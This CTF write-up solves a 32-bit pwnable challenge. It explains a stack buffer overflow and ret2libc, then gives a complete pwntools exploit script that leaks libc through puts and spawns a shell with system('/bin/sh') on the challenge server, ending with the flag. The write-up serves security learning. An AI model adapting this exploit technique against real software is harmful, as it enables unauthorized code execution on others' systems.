
My solutions for various CTF challenges

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Pwnable - Points: 1

dRop the Beat DJ!!

Author: Y311J(신재욱)

nc prob.vulnerable.kr 20002



The binary lets you read 300 bytes from stdin into 100 bytes buffer, so there is a buffer overflow. Lets check the enabled security mechanisms:

$ checksec drop_the_beat_easy
    Arch:     i386-32-little
	RELRO:    Partial RELRO
	Stack:    No canary found
	NX:       NX enabled
	PIE:      No PIE (0x8048000)

No canary found, so we get code execution, but NX is enabled, so we can not execute shellcode from the stack. The given libc already hints that we should ret2libc, but we have to leak the libc base address. We can jump to the function puts with the address of puts in GOT as argument to print the actual address of puts out and jump back to the beginning of the main function afterwards. Since it is 32 bit binary, the arguments are passed on the stack. With the leaked address and the given libc we can calculate the correct offsets of puts and system and the string /bin/sh.

In the second stage we can overflow the buffer to jump to the system function with the argument /bin/sh to spawn the shell and get the flag.

Exploit script:

from pwn import *

libc = ELF('libc.so.6')
e = ELF('drop_the_beat_easy')

# p = process('drop_the_beat_easy')
p = remote('prob.vulnerable.kr', 20002)

print p.recvuntil('2) No Beat For You..!\n')

print p.recvuntil('Give Me a Beat!!\n')

p.sendline('A' * 100 + 'A' * 4 + p32(e.symbols['puts']) + p32(e.symbols['main']) + p32(e.got['puts']))
print p.recvuntil('AWESOME!\n')

puts = u32(p.recv(4))
print hex(puts)

libc_base = puts - libc.symbols['puts']
print 'libc_base: ' + hex(libc_base)
system = libc_base + libc.symbols['system']
sh = libc_base + libc.search("/bin/sh").next()

print p.recvuntil('2) No Beat For You..!\n')

print p.recvuntil('Give Me a Beat!!\n')

p.sendline('A' * 100 + 'A' * 4 + p32(system) + 'A' * 4 + p32(sh))


flag: KorNewbie{R0PR0PR@P~@!#GrE4T_3EaT_!ROPROPROP*@(#}